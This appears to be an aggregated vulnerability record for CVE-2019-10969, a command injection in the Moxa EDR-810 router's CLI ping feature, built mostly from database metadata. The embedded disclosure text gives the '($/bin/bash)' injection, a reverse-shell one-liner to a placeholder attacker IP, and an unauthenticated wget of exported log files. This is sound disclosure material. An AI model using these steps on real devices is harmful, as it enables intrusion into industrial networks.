      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201910-1593",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "edr-810",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "moxa",
        "version": "5.1"
      },
      {
        "model": "edr-810 series",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "moxa",
        "version": "5.1"
      },
      {
        "model": "edr-810",
        "scope": "lte",
        "trust": 0.6,
        "vendor": "moxa",
        "version": "\u003c=5.1"
      },
      {
        "model": "edr-810",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "moxa",
        "version": null
      },
      {
        "model": "edr-810",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "moxa",
        "version": "5.1"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-43363"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-010769"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-10969"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201910-006"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:moxa:edr-810_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "5.1",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:moxa:edr-810:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-10969"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "RandoriSec",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "154943"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201910-006"
      }
    ],
    "trust": 0.7
  },
  "cve": "CVE-2019-10969",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 6.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.0,
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "Single",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 6.5,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2019-10969",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "CNVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 6.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.0,
            "id": "CNVD-2019-43363",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 6.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.0,
            "id": "VHN-142568",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:S/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.2,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "HIGH",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.2,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2019-10969",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "High",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2019-10969",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2019-43363",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201910-006",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-142568",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-43363"
      },
      {
        "db": "VULHUB",
        "id": "VHN-142568"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-010769"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-10969"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201910-006"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Moxa EDR 810, all versions 5.1 and prior, allows an authenticated attacker to abuse the ping feature to execute unauthorized commands on the router, which may allow an attacker to perform remote code execution. Moxa EDR 810 Contains an input validation vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Moxa EDR-810 is a highly integrated industrial multi-port security router with firewall / NAT / VPN and hosted Layer 2 switch functions. \n\nMoxa EDR-810 5.1 and earlier has a remote code execution vulnerability. An attacker could use this vulnerability to implement remote code execution. Moxa EDR 810 is an Ethernet router manufactured by Moxa Company in Taiwan, China. During an engagement for a client, RandoriSec found 2 vulnerabilities on Moxa EDR-810 Series Secure Routers. The first one is a command injection vulnerability found on the CLI allowing an authenticated user to obtain root privileges. And the other one is an improper access control found on the web server allowing to retrieve log files. \n\nAs usual, we reported those issues directly to Moxa and ICS-CERT (Industrial Control Systems Cyber Emergency Response Team) in order to \u00e2\u20ac\u0153responsible disclose\u00e2\u20ac them. \n\nThe ICS-CERT advisory was published on their website and a new EDR-810 firmware was provided by Moxa. \n\nMany thanks to Moxa and ICS-CERT teams for their help. \n\n\n\nAdvisory\n\nThe following two product vulnerabilities were identified in Moxa\u00e2\u20ac\u2122s EDR-810 Series Secure Routers, all versions 5.1 and prior are vulnerable:\n\nCVE-2019-10969: An exploitable command injection vulnerability exists in the CLI functionality, which is provided by the Telnet and SSH services. As the CLI is executed with root privileges, it is possible to obtain a root shell on the device. A CVSS v3 base score of 7.2 has been calculated. \nCVE-2019-10963: An unauthenticated attacker can retrieve all the log files (Firewall, IPSec and System) from the webserver. In order to exploit the issue, a legitimate user had to export the log files previously. A CVSS v3 base score of 4.3 has been calculated. \n\n\nExploitation\n\nCVE-2019-10969 - Ping Command Injection\n\nThe Telnet and SSH services provide a Command Line Interface (CLI), which is a restricted shell allowing to perform a subset of actions on the device. The ping function of the CLI is vulnerable to command injection. It is possible to specify a specific hostname, such as ($/bin/bash), in order to obtain a shell as shown below: \n\nPing command injection\n\nDue to limitations on the CLI, it is not possible to use the shell as is. The attacker can use a reverse shell as shown below:\nbash -i \u003e\u0026 /dev/tcp/YOUR_IP_ADDRESS/1234 0\u003e\u00261\n\n\nCVE-2019-10963 - Missing Access Control On Log Files\n\nWhen a legitimate user (admin or configadmin for instance) export the logs files from the MOXA router. The files are stored at the root of the webserver, as follow:\n\nhttp://IP_ADDRESS_MOXA/MOXA_All_LOG.tar.gz\nAn attacker can retrieve this archive without being authenticated on the Web interface as shown below:\n\n# wget http://192.168.0.1/MOXA_All_LOG.tar.gz\n--2019-02-13 17:35:19--  http://192.168.0.1/MOXA_All_LOG.tar.gz\nConnexion \u00c3  192.168.0.1:80... connect\u00c3\u00a9. \nrequ\u00c3\u00aate HTTP transmise, en attente de la r\u00c3\u00a9ponse... 200 OK\nTaille : 15724 (15K) [text/plain]\nSauvegarde en : \" MOXA_All_LOG.tar.gz \"\n\nMOXA_All_LOG.tar.gz                                       100%[====================================================================================================================================\u003e]  15,36K  --.-KB/s    ds 0s      \n\n2019-02-13 17:35:19 (152 MB/s) - \" MOXA_All_LOG.tar.gz \" sauvegard\u00c3\u00a9 [15724/15724]\n\n# tar ztvf MOXA_All_LOG.tar.gz \ndrwxr-xr-x admin/root        0 2019-02-13 11:55 moxa_log_all/\n-rw-r--r-- admin/root   326899 2019-02-13 11:55 moxa_log_all/MOXA_Firewall_LOG.ini\n-rw-r--r-- admin/root      156 2019-02-13 11:55 moxa_log_all/MOXA_IPSec_LOG.ini\n-rw-r--r-- admin/root    68465 2019-02-13 11:55 moxa_log_all/MOXA_LOG.ini\n\n\nMitigation\n\nIt is recommended to install at least the firmware version 5.3 from Moxa website. \n\n\n\nTimeline\n\n2019-02-24: Vendor Disclosure\n2019-02-24: Advisory sent to ICS-CERT\n2019-09-30: Advisory published by Moxa\n2019-10-01: Advisory published by ICS-CERT\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-10969"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-010769"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2019-43363"
      },
      {
        "db": "VULHUB",
        "id": "VHN-142568"
      },
      {
        "db": "PACKETSTORM",
        "id": "154943"
      }
    ],
    "trust": 2.34
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2019-10969",
        "trust": 3.2
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-19-274-03",
        "trust": 2.5
      },
      {
        "db": "PACKETSTORM",
        "id": "154943",
        "trust": 1.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-010769",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201910-006",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2019-43363",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.3697",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-142568",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-43363"
      },
      {
        "db": "VULHUB",
        "id": "VHN-142568"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-010769"
      },
      {
        "db": "PACKETSTORM",
        "id": "154943"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-10969"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201910-006"
      }
    ]
  },
  "id": "VAR-201910-1593",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-43363"
      },
      {
        "db": "VULHUB",
        "id": "VHN-142568"
      }
    ],
    "trust": 1.35873015
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-43363"
      }
    ]
  },
  "last_update_date": "2023-12-18T12:43:15.424000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "EDR-810 Series",
        "trust": 0.8,
        "url": "https://www.moxa.com/en/support/search?psid=48041"
      },
      {
        "title": "Patch for Moxa EDR-810 Remote Code Execution Vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/192699"
      },
      {
        "title": "Moxa EDR 810 Series Security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=98758"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-43363"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-010769"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201910-006"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-20",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-142568"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-010769"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-10969"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "https://www.us-cert.gov/ics/advisories/icsa-19-274-03"
      },
      {
        "trust": 2.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10969"
      },
      {
        "trust": 1.7,
        "url": "http://packetstormsecurity.com/files/154943/moxa-edr-810-command-injection-information-disclosure.html"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-10969"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.3697/"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/moxa_all_log.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://ip_address_moxa/moxa_all_log.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10963"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-43363"
      },
      {
        "db": "VULHUB",
        "id": "VHN-142568"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-010769"
      },
      {
        "db": "PACKETSTORM",
        "id": "154943"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-10969"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201910-006"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-43363"
      },
      {
        "db": "VULHUB",
        "id": "VHN-142568"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-010769"
      },
      {
        "db": "PACKETSTORM",
        "id": "154943"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-10969"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201910-006"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-12-02T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2019-43363"
      },
      {
        "date": "2019-10-08T00:00:00",
        "db": "VULHUB",
        "id": "VHN-142568"
      },
      {
        "date": "2019-10-23T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-010769"
      },
      {
        "date": "2019-10-23T18:25:18",
        "db": "PACKETSTORM",
        "id": "154943"
      },
      {
        "date": "2019-10-08T19:15:09.963000",
        "db": "NVD",
        "id": "CVE-2019-10969"
      },
      {
        "date": "2019-10-01T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201910-006"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-12-03T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2019-43363"
      },
      {
        "date": "2019-10-23T00:00:00",
        "db": "VULHUB",
        "id": "VHN-142568"
      },
      {
        "date": "2019-10-23T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-010769"
      },
      {
        "date": "2019-10-23T20:15:12.053000",
        "db": "NVD",
        "id": "CVE-2019-10969"
      },
      {
        "date": "2019-10-28T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201910-006"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201910-006"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Moxa EDR 810 Input validation vulnerability",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-010769"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "input validation error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201910-006"
      }
    ],
    "trust": 0.6
  }
}

GHSA-VJ73-6VQH-XCCV

Vulnerability from github – Published: 2022-05-24 16:58 – Updated: 2024-04-04 02:09

Details

Severity ?

7.2 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [],
  "aliases": [
    "CVE-2019-10969"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-10-08T19:15:00Z",
    "severity": "HIGH"
  },
  "details": "Moxa EDR 810, all versions 5.1 and prior, allows an authenticated attacker to abuse the ping feature to execute unauthorized commands on the router, which may allow an attacker to perform remote code execution.",
  "id": "GHSA-vj73-6vqh-xccv",
  "modified": "2024-04-04T02:09:43Z",
  "published": "2022-05-24T16:58:00Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10969"
    },
    {
      "type": "WEB",
      "url": "https://www.us-cert.gov/ics/advisories/icsa-19-274-03"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/154943/Moxa-EDR-810-Command-Injection-Information-Disclosure.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

FKIE_CVE-2019-10969

Vulnerability from fkie_nvd - Published: 2019-10-08 19:15 - Updated: 2024-11-21 04:20

Severity ?

7.2 (High) - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Summary

References

URL	Tags
ics-cert@hq.dhs.gov	http://packetstormsecurity.com/files/154943/Moxa-EDR-810-Command-Injection-Information-Disclosure.html
ics-cert@hq.dhs.gov	https://www.us-cert.gov/ics/advisories/icsa-19-274-03	Third Party Advisory, US Government Resource
af854a3a-2127-422b-91ae-364da2661108	http://packetstormsecurity.com/files/154943/Moxa-EDR-810-Command-Injection-Information-Disclosure.html
af854a3a-2127-422b-91ae-364da2661108	https://www.us-cert.gov/ics/advisories/icsa-19-274-03	Third Party Advisory, US Government Resource

Impacted products

	Vendor	Product	Version
	moxa	edr-810_firmware	*
	moxa	edr-810	-

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:moxa:edr-810_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "A28DDE8C-B6D2-49CD-86D0-7B4DB121C642",
              "versionEndIncluding": "5.1",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:moxa:edr-810:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "2A6BD14C-FD19-4AF7-A221-91B1A49C0A58",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Moxa EDR 810, all versions 5.1 and prior, allows an authenticated attacker to abuse the ping feature to execute unauthorized commands on the router, which may allow an attacker to perform remote code execution."
    },
    {
      "lang": "es",
      "value": "Moxa EDR 810, todas las versiones 5.1 y anteriores, permite a un atacante autenticado abusar de la funcionalidad ping para ejecutar comandos no autorizados en el enrutador, lo que puede permitir a un atacante realizar la ejecuci\u00f3n de c\u00f3digo remota."
    }
  ],
  "id": "CVE-2019-10969",
  "lastModified": "2024-11-21T04:20:16.020",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 6.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.2,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "HIGH",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 1.2,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2019-10-08T19:15:09.963",
  "references": [
    {
      "source": "ics-cert@hq.dhs.gov",
      "url": "http://packetstormsecurity.com/files/154943/Moxa-EDR-810-Command-Injection-Information-Disclosure.html"
    },
    {
      "source": "ics-cert@hq.dhs.gov",
      "tags": [
        "Third Party Advisory",
        "US Government Resource"
      ],
      "url": "https://www.us-cert.gov/ics/advisories/icsa-19-274-03"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://packetstormsecurity.com/files/154943/Moxa-EDR-810-Command-Injection-Information-Disclosure.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "US Government Resource"
      ],
      "url": "https://www.us-cert.gov/ics/advisories/icsa-19-274-03"
    }
  ],
  "sourceIdentifier": "ics-cert@hq.dhs.gov",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-20"
        }
      ],
      "source": "ics-cert@hq.dhs.gov",
      "type": "Secondary"
    },
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-20"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

CNVD-2019-43363

Vulnerability from cnvd - Published: 2019-12-02

Title

Moxa EDR-810远程代码执行漏洞

Description

Moxa EDR-810是一款高度集成的工业多端口安全路由器，具有防火墙/NAT/VPN及托管型第2层交换机功能。 Moxa EDR-810 5.1及更早版本存在远程代码执行漏洞。该漏洞源于该产品允许认证攻击者滥用ping功能，从而可在路由器上执行未经授权的命令。攻击者可利用该漏洞实现远程代码执行。

Severity

中

Patch Name

Moxa EDR-810远程代码执行漏洞的补丁

Patch Description

Moxa EDR-810是一款高度集成的工业多端口安全路由器，具有防火墙/NAT/VPN及托管型第2层交换机功能。 Moxa EDR-810 5.1及更早版本存在远程代码执行漏洞。该漏洞源于该产品允许认证攻击者滥用ping功能，从而可在路由器上执行未经授权的命令。攻击者可利用该漏洞实现远程代码执行。目前，供应商发布了安全公告及相关补丁信息，修复了此漏洞。

Formal description

厂商已发布了漏洞修复程序，请及时关注更新： https://www.moxa.com/en/support/product-support/software-and-documentation/search?psid=48041

Reference

https://nvd.nist.gov/vuln/detail/CVE-2019-10969

Impacted products

Name
MOXA EDR-810 <=5.1

Show details on source website

JSON

To clipboard

{
  "cves": {
    "cve": {
      "cveNumber": "CVE-2019-10969",
      "cveUrl": "https://nvd.nist.gov/vuln/detail/CVE-2019-10969"
    }
  },
